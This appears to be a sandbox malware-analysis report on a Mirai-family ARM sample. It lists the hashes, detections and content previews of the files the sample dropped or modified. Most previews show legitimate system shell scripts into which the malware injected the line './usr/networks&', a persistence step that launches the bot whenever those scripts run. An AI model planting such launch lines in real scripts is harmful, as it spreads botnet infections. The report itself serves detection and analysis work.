                                                                                                                        Preview: ./usr/networks&. func_usage; exit 0 ;;. --version | --versio | --versi | --vers | --ver | --ve | --v ). func_version; exit 0 ;;. esac. fi. func_usage 1>&2. exit 1. ;;. esac.fi..# eval_gettext MSGID.# looks up the translation of MSGID and substitutes shell variables in the.# result..eval_gettext () {. gettext "$1" | (export PATH `envsubst --variables "$1"`; envsubst "$1").}..# eval_ngettext MSGID MSGID-PLURAL COUNT.# looks up the translation of MSGID / MSGID-PLURAL for COUNT and substitutes.# shell variables in the result..eval_ngettext () {. ngettext "$1" "$2" "$3" | (export PATH `envsubst --variables "$1 $2"`; envsubst "$1 $2").}..# Note: This use of envsubst is much safer than using the shell built-in 'eval'.# would be..# 1) The security problem with Chinese translations that happen to use a.# character such as \xe0\x60 is avoided..# 2) The security problem with malevolent translators who put in command lists.# like "
                                                                                                                        /usr/networks
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):307960
                                                                                                                        Entropy (8bit):5.819679405566689
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:T2s/gAWuboqsJ9xcJxspJBqQgTuaJZRhVabE5wKSDP99zBa77oNsKqqfPqOJ:T2s/bW+UmJqBxAuaPRhVabEDSDP99zBT
                                                                                                                        MD5:EEC5C6C219535FBA3A0492EA8118B397
                                                                                                                        SHA1:292559E94F1C04B7D0C65D4A01BBBC5DC1FF6F21
                                                                                                                        SHA-256:12013662C71DA69DE977C04CD7021F13A70CF7BED4CA6C82ACBC100464D4B0EF
                                                                                                                        SHA-512:3482C8324A18302F0F37B6E23ED85F24FFF9F50BB568D8FD7461BF57F077A7C592F7A88BB2E1C398699958946D87BB93AB744D13A0003F9B879C15E6471F7400
                                                                                                                        Malicious:true
                                                                                                                        Yara Hits:
                                                                                                                        • Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: /usr/networks, Author: Florian Roth
                                                                                                                        • Rule: JoeSecurity_Mirai_8, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Mirai_9, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                        • Rule: JoeSecurity_Mirai_4, Description: Yara detected Mirai, Source: /usr/networks, Author: Joe Security
                                                                                                                        Antivirus:
                                                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                                                        • Antivirus: Metadefender, Detection: 54%, Browse
                                                                                                                        • Antivirus: ReversingLabs, Detection: 69%
                                                                                                                        Preview: .ELF..............(.........4...P.......4. ...(........p............(...(...............................................................8...........................................Q.td..................................-...L.................@-.,@...0....S..... 0....S........../..0...0...@..../.............-.@0....S...M.8...8......../.0....0....S.....$0....S....../........../................................. ... -...-.......-......0.....V..............O-..M..@....M..P....... ...0..............2............ .......0..N........`... ......P0..H.....X..H..$x..........Z~....P.....U......O..../...V....................Z.....4....`.......0... ...0... ..............2..1C......P... .......... ..~~...0....S......@..Ca......$,..!$...<.......$...,..0!......"<.. 4.......4...<...0..3a...9....."!...1...0....c...P...;.............p........+..0 ...p..$L... B.P....p...@... ..).H..........0.....<.......0.....0... ..(....S.. ..........(,..|0C..+...0......( ...S...........Z.....
                                                                                                                        /usr/sbin/alsa-info.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):25983
                                                                                                                        Entropy (8bit):5.455683610707543
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:AhYCrncz9NJ20iuYwj9hkinrV8a0cvxo5sLG:Evrncz9NJGrwj9hkinrV8aHgsLG
                                                                                                                        MD5:9DEFBAA753E5A9E5620E466E81715A35
                                                                                                                        SHA1:751D0F882BE1494064C68A074DA5DC1CE599A349
                                                                                                                        SHA-256:A8E3C858BE59F3DC8811EC7979F347FD07D7213089E5E3A1BD5BA7AFBBA1CE9C
                                                                                                                        SHA-512:24851711C125FB277844B0AEE501A25EC2ED797417FFFF6F862793E24F07B94DF227DB54938728FBED1A711C74D84A7E86599BE248BC173387406BAC27F4E64F
                                                                                                                        Malicious:true
                                                                                                                        Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ -s "$SHFILE" -a "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been u
                                                                                                                        /usr/share/alsa-base/alsa-info.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text, with very long lines
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):25464
                                                                                                                        Entropy (8bit):5.453877096685684
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:xhDCrnchINJ20QuPxj9DksnrVfp0+KvN5sLF:nernchINJsWxj9DksnrVfp0PsLF
                                                                                                                        MD5:D8A586F0E09BD885937F5C46F02D64D0
                                                                                                                        SHA1:2B5E662E8047318FB7A69BC3EEC9BB72A6300EDB
                                                                                                                        SHA-256:62F4B99FB4C5B55F17E4299589190545998B875C431470D2A87D0E43D7DF990B
                                                                                                                        SHA-512:70B65F5F85A5C2C82FCFD58F0A22CA13C7624AA27C8927EE65933D892443B718461BAD7250AC3271C71C0C22850710E503D20E6F2F33C7BE2FE5D5E8C97C0F13
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..SHFILE=`mktemp -t alsa-info.XXXXXXXXXX` || exit 1..wget -O $SHFILE "http://www.alsa-project.org/alsa-info.sh" >/dev/null 2>&1..REMOTE_VERSION=`grep SCRIPT_VERSION $SHFILE |head -n1 |sed 's/.*=//'`..if [ "$REMOTE_VERSION" != "$SCRIPT_VERSION" ]; then...if [[ -n $DIALOG ]]...then....OVERWRITE=....if [ -w $0 ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to install it?\nNOTICE: The original file $0 will be overwritten!" 0 0.....DIALOG_EXIT_CODE=$?.....if [[ $DIALOG_EXIT_CODE = 0 ]]; then..... OVERWRITE=yes.....fi....fi....if [ -z "$OVERWRITE" ]; then.....dialog --yesno "Newer version of ALSA-Info has been found\n\nDo you wish to download it?" 0 0.....DIALOG_EXIT_CODE=$?....fi....if [[ $DIALOG_EXIT_CODE = 0 ]]....then.....echo "Newer version detected: $REMOTE_VERSION".....echo "To view the ChangeLog, please visit $CHANGELOG".....if [ "$OVERWRITE" = "yes" ]; then......cp $SHFILE $0......echo "ALSA-Info script has been updated to v $REM
                                                                                                                        /usr/share/alsa/utils.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):4725
                                                                                                                        Entropy (8bit):5.44928341819888
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:yGC9i91fZ1j73kqM51SvbZGspLpZonAeVceVIP/yKIkC6eZju:yGC90f/4SvbYapZoh/GC64ju
                                                                                                                        MD5:B4F115765D68E40BEBB845FA7F437539
                                                                                                                        SHA1:4C37804189C7D91916E7050F4E4783A4C7F2F389
                                                                                                                        SHA-256:9EAA55914953E4BAE6AF1E28841BD329160A16D17DE8061B04519669B2B2BCF9
                                                                                                                        SHA-512:27D938F1CA106CA6431F2B8635D223BAA47D192D983357A649B95B70DB931199E8B084C2EB337321D9D6B4D4F63D6BA64A8CEFA5FE888896BE7FA1C5D2983CC9
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.bugout() { echo "${MYNAME}: Programming error" >&2 ; exit 123 ; }..echo_card_indices().{..if [ -f /proc/asound/cards ] ; then...sed -n -e's/^[[:space:]]*\([0-7]\)[[:space:]].*/\1/p' /proc/asound/cards..fi.}..filter_amixer_output().{..sed \...-e '/Unable to find simple control/d' \...-e '/Unknown playback setup/d' \...-e '/^$/d'.}..# The following functions try to set many controls..# No card has all the controls and so some of the attempts are bound to fail..# Because of this, the functions can't return useful status values...# $1 <control>.# $2 <level>.# $CARDOPT.unmute_and_set_level().{..{ [ "$2" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "$2" unmute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $CARDOPT.mute_and_zero_level().{..{ [ "$1" ] && [ "$CARDOPT" ] ; } || bugout..amixer $CARDOPT -q set "$1" "0%" mute 2>&1 | filter_amixer_output || :..return 0.}..# $1 <control>.# $2 "on" | "off".# $CARDOPT.switch_control().{..{ [ "$2" ] &&
                                                                                                                        /usr/share/brltty/initramfs/brltty.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):46
                                                                                                                        Entropy (8bit):3.925523369006428
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                                                                                        MD5:2CADDA792FBD37B54978108B6CC504D4
                                                                                                                        SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                                                                                        SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                                                                                        SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 0../usr/networks&.exit 1.
                                                                                                                        /usr/share/cups/braille/cups-braille.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:UTF-8 Unicode text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3551
                                                                                                                        Entropy (8bit):5.478748088887141
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:OANcIOY/L/1RAnw/UYfot2tAtldWfRzRukEu/YmWhS3mj4VT5V5TNVIt6Wousukz:OANSY/L/1R3/SRWikEu9bVaH/c
                                                                                                                        MD5:6025702AFC2865AA8BA8638B3B590284
                                                                                                                        SHA1:82A57782652A5D981E9A86E55F0F6D5A276ACEE1
                                                                                                                        SHA-256:98D84975905042A77F6E514D7C54478701D6C0CC4BDDFE8B047D2BE3CD475C5C
                                                                                                                        SHA-512:0E3A45F3160B3CA7442C4B2D4A9A2AD0A5390AC7091E0F9C870A073C3E6C408C171DE71014005196FF310A67B8ABC08BD0619B81972C118F5CF8281B9234C427
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. exit 1. ;;. esac. printf "%s" "$VALUE".}..[ -z "$NB" ] && NB=1..#.# Page size.# Units in 100th of mm.#..# TODO: better handle imageable area.PAGESIZE=$(getOption PageSize).case "$PAGESIZE" in. Legal). PAGEWIDTH=21590. PAGEHEIGHT=35560. ;;. Letter). PAGEWIDTH=21590. PAGEHEIGHT=27940. ;;. A3). PAGEWIDTH=29700. PAGEHEIGHT=42000. ;;. A4). PAGEWIDTH=21000. PAGEHEIGHT=29700. ;;. A4TF). PAGEWIDTH=21000. PAGEHEIGHT=30480. ;;. A5). PAGEWIDTH=14850. PAGEHEIGHT=21000. ;;. 110x115). PAGEWIDTH=27940. PAGEHEIGHT=29210. ;;. 110x120). PAGEWIDTH=27940. PAGEHEIGHT=30480. ;;. 110x170). PAGEWIDTH=27940. PAGEHEIGHT=43180. ;;. 115x110). PAGEWIDTH=29210. PAGEHEIGHT=27940. ;;. 120x120). PAGEWIDTH=30480. PAGEHEIGHT=30480. ;;. *). printf "ERROR: Unknown page size '%s'\n" "$PAGESIZE" >&2. exit 1. ;;.esac..#.TODO: hardcoded margin.PRINTABLEWIDTH=$((PAGEWIDTH - 100
                                                                                                                        /usr/share/cups/braille/index.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):590
                                                                                                                        Entropy (8bit):5.080350031939274
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:aNz9qyz2WNjcIBT/s8lHzSDIyvSs/mFex/UeHz6GJGIyzDFLn:69qA7R/s6TSkc/yex/UeT6GJHa
                                                                                                                        MD5:D662E33F24591E0E67D329E55610FA21
                                                                                                                        SHA1:C23AA5BAE84C14C8E48023BC330990B4377826C0
                                                                                                                        SHA-256:1A9C2355734541A8364E25854C96B0A6C86E524FE55224C9205EF9F0F40B5E55
                                                                                                                        SHA-512:5F7DFCBCCABFAF9D56B5166897CDAA66B0146324A2D3F398B99713CFAE58774FE4D678F04EFC19253366E2455246692A4A9572423331A828459192561B66C40B
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. *) printf "ERROR: unsupported '%s' page folding\n" "$FOLDING" >&2 ; exit 1 ;;. esac.. # Configure dots spacing. case "$TEXTDOTDISTANCE" in. 220) INIT+=,TD1 ;;. 250) INIT+=,TD0 ;;. 320) INIT+=,TD2 ;;. *) printf "ERROR: unsupported '%s' text dot distance\n" "$TEXTDOTDISTANCE" >&2 ; exit 1 ;;. esac. case $GRAPHICDOTDISTANCE in. 160) INIT+=,GD2 ;;. 200) INIT+=,GD0 ;;. 250) INIT+=,GD1 ;;. *) printf "ERROR: unsupported '%s'graphic dot distance\n" "$GRAPHICDOTDISTANCE" >&2 ; exit 1 ;;. esac.. echo "$INIT".}../usr/networks&.exit 1.
                                                                                                                        /usr/share/cups/braille/indexv3.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):945
                                                                                                                        Entropy (8bit):4.9071581716168575
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:hO+DYLYWYZBBmbq2rywi+bdKz80g/D+6k9JSW9L:DDYLYWYZ3rwi+BKjg/D+RJSW9L
                                                                                                                        MD5:F0CACB80F022AB8FC64F04310E59BEC2
                                                                                                                        SHA1:059D10F9C33BF8724F38F1E4A444022D9CEDBD82
                                                                                                                        SHA-256:62634D82D3013B5004E7220BC0CEBA6AE0C6DAFDC41C5B4D19B49A5154BFCE09
                                                                                                                        SHA-512:B94116448FBC22E5E205225FD18B8D3D159BD5BA2E68758BF12EE4EA12860F40C0F5DD8B7F064C8B1994280BDD999779035F80F2D55937C54A649F02A8BC7068
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..exit 1. fi. if [ $LINESPACING -lt 100 ]. then..echo "ERROR: too small $LINESPACING line spacing" >&2..exit 1. fi. INIT+=,LS$(($LINESPACING / 10)). ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Hoping the user properly configured an 8-dot table. 8) ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                                        /usr/share/cups/braille/indexv4.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):818
                                                                                                                        Entropy (8bit):4.8178661177968065
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:C9DYLYWYZBBmbq2rywd8P8LVz80g/D+6k9JSW9L:wDYLYWYZ3rwyP8Bjg/D+RJSW9L
                                                                                                                        MD5:07C3F2CE31B1380132DE8B1D5B9C4BA8
                                                                                                                        SHA1:769D00809D188A7D9F8357152C9B82F634C0514B
                                                                                                                        SHA-256:162E03582392361663035FF70A573CB379796CA647404BFFBE1C22D6AE7C25FB
                                                                                                                        SHA-512:CB698C8E13D0635643F5F8102FFA961D050649F82FB915155B5D19E4CFC5985C86586BF41082731ACFDCBA5F799FF7F056A4D6AD0337383FABC4731D352D16CD
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. exit 1. ;;. esac.. if [ $LIBLOUIS1 != None -o \. $LIBLOUIS2 != None -o \. $LIBLOUIS3 != None -o \. $LIBLOUIS4 != None ]. then. # software-translated, enforce a 6-dot table if needed. case $TEXTDOTS in. # Firmware 11.02.1 and above allow to make sure to be using a 6-dot table. 6) INIT+=,BT0 ;;. # Firmware 11.02.1 and above allow to make sure to be using a 8-dot table. 8) INIT+=,BT6 ;;. *) echo "ERROR: unsupported $TEXTDOTS dots" >&2 ; exit 1 ;;. esac. else. # Hoping the user configured a table with appropriate number of dots. INIT+=,BT$TABLE. fi.. # roger. INIT+=";".else. # No support for temporary parameters. Hoping that the user configured CUPS. # the same way as the embosser.. INIT=.fi../usr/networks&.exit 1.
                                                                                                                        /usr/share/debconf/confmodule.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/acpid/examples/ac.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/acpid/examples/default.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):309
                                                                                                                        Entropy (8bit):4.972882784760757
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:3Z2iGYkj5Ri36+u4DXFI7WBRZrjFI7efgYjFI7e6RTaKtkmTn:J2iB6PiZqWZdqefgQq9tPkmTn
                                                                                                                        MD5:8B5CC9506A59F35C919D0CF65E3D75FA
                                                                                                                        SHA1:956100F1C2B0A99C8B578DC6CE4854991089289A
                                                                                                                        SHA-256:F53B8D26AD4D0CDE785D89C2F85D2132B943D5AB01FC482A8D53D1D6D3A01D5E
                                                                                                                        SHA-512:725E036838D708E1BCBA1A5C89470B892BA249305AC5D237B203AB21B0794A1BC64917ACBBD1793F41F530E482C85C9C252D143DACB68E9667088E274139B905
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&..test -e "$DEVNAME" || { echo "$DEVNAME doesn't exist, aborting"; exit 1; }..#echo "$DEVNAME exists"..if blockdev --rereadpt "$DEVNAME"; then...echo "blockdev --rereadpt succeeded"...exit 0..fi..echo "blockdev --rereadpt failed, exit code: $?".done.echo "Timed out".) &../usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/cron/examples/cron-tasks-review.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):3647
                                                                                                                        Entropy (8bit):4.544491450799858
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:TExE7LzpY0V0rmzBpuYlzsSwG7SRpvzTC/8mO:TExgHpYa0ABppdsSyk8mO
                                                                                                                        MD5:734F4010B22A9F64DBCCED57155A6396
                                                                                                                        SHA1:1A3984285346A3FB8CF1A2666F273A8EFC300495
                                                                                                                        SHA-256:5F76E60D53DEB684C98DFE7E2306D0AAC86938ECB6B68AA41283F560CFEBACF8
                                                                                                                        SHA-512:8BC6C5176E4742ECBD69498B7CA52955CAF78031A996E0B50DFC23AA490C02B00B71E70DA500D27BEF241025B2FB3D4C50A943D6CB49E4964127E2513E836ADC
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. -h|--help) usage; exit 0;;. -v|--version) version; exit 0;;. -s|--syslog) syslog="yes";;. -i|--info) send_info="yes";;. *) ;;. esac.done. ..send_message () {.. level=$1. msg=$2. [ "$level" = "info" ] && [ "$send_info" = "no" ] && return.. if [ "$syslog" = "yes" ] ; then. logger -p cron.$level -t CRON $msg. else. case $level in. "warn"). echo "WARN: $msg" >&2. ;;. "info"). echo "INFO: $msg" . ;;. esac. fi.}..warn () {.# Send a warning to the user. file=$1. reason=$2.. name=`basename $file`. # Skip hidden files. echo $name | grep -q -E '^\.' && return. # Skip disabled files. echo $name | grep -q -E '\.disabled' && return.. # TODO: Should we send warnings for '.old' or '.orig'?.. # Do not send a warning if the file is '.dpkg-old' or '.dpkg-dist'. if ! echo $file | grep -q -E '\.dp
                                                                                                                        /usr/share/doc/gawk/examples/network/PostAgent.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/gawk/examples/prog/igawk.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:awk or perl script, ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1829
                                                                                                                        Entropy (8bit):4.38604786798686
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:yiYuM2UFMx/sIo6ml4wiQDRoLe/HfwoDt8vPP6k30YXU0kKhpjKGg:eBMx/tKiQDWawit8vPP6A0YXjnhpjXg
                                                                                                                        MD5:141401CE535E9FFF3A9F3C9D5ECEC093
                                                                                                                        SHA1:B0A5FA40FFBDAFF1F415B38513CE2A7921328D05
                                                                                                                        SHA-256:68EC7433147E2F312EA47B69A5CEAE1B781AC9C95260A8D95F2A9354E26A0C35
                                                                                                                        SHA-512:A3CC9A94FB7D97A1F57AE1D29A3432A56ACCE85C50E0F4073D65AC5CF77C50DE4A74E207203141ABD7297B62068BB937A3C63E5880A79C09950E5E6DD562D1BC
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&. exit 0 ;;.. -[W-]*) opts="$opts '$1'" ;;.. *) break ;;. esac. shift.done..if [ -z "$program" ].then. program=${1?'missing program'}. shift.fi..# At this point, `program' has the program..expand_prog='..function pathto(file, i, t, junk).{. if (index(file, "/") != 0). return file.. if (file == "-"). return file.. for (i = 1; i <= ndirs; i++) {. t = (pathlist[i] "/" file). if ((getline junk < t) > 0) {. # found it. close(t). return t. }. }. return "".}.BEGIN {. path = ENVIRON["AWKPATH"]. ndirs = split(path, pathlist, ":"). for (i = 1; i <= ndirs; i++) {. if (pathlist[i] == ""). pathlist[i] = ".". }. stackptr = 0. input[stackptr] = ARGV[1] # ARGV[1] is first file.. for (; stackptr >= 0; stackptr--) {. while ((getline < input[stackptr]) > 0) {. if (tolower($1) != "@include") {. print
                                                                                                                        /usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/gdb/contrib/ari/gdb_find.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):23
                                                                                                                        Entropy (8bit):3.882045108136863
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:qXVOORgn:Tn
                                                                                                                        MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                                        SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                                        SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                                        SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                                        Malicious:false
                                                                                                                        Preview: ./usr/networks&.exit 1.
                                                                                                                        /usr/share/doc/gdb/contrib/expect-read1.sh
                                                                                                                        Process:/tmp/MGuvcs6Ocz
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):253
                                                                                                                        Entropy (8bit):5.267626424494032
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:aBH51mUeX3+G3Wj3kGjVnAdiIVUe8J24n:aB51je+f3VnBaUe8J24n
                                                                                                                        MD5:37C0552689BD7719FFBE66F4C9AB831B
                                                                                                                        SHA1:8BA6E9AED3FF50AB5AE1E516E1ADEE1F1464BF79
                                                                                                                        SHA-256:6B21FC4B985122F02025F5050FD3C0910228E394DC9E72EBEC9F6354785BDF0B
                                                                                                                        SHA-512:EA97773FE3E45B9A392CA74C1D8D527952980474C75846495A796652FAB647128844E9E87529D51CBF7520ACA08F7C1188E676E5E5BAC4F0FAA7B75B66538F31
                                                                                                                        Malicious:false
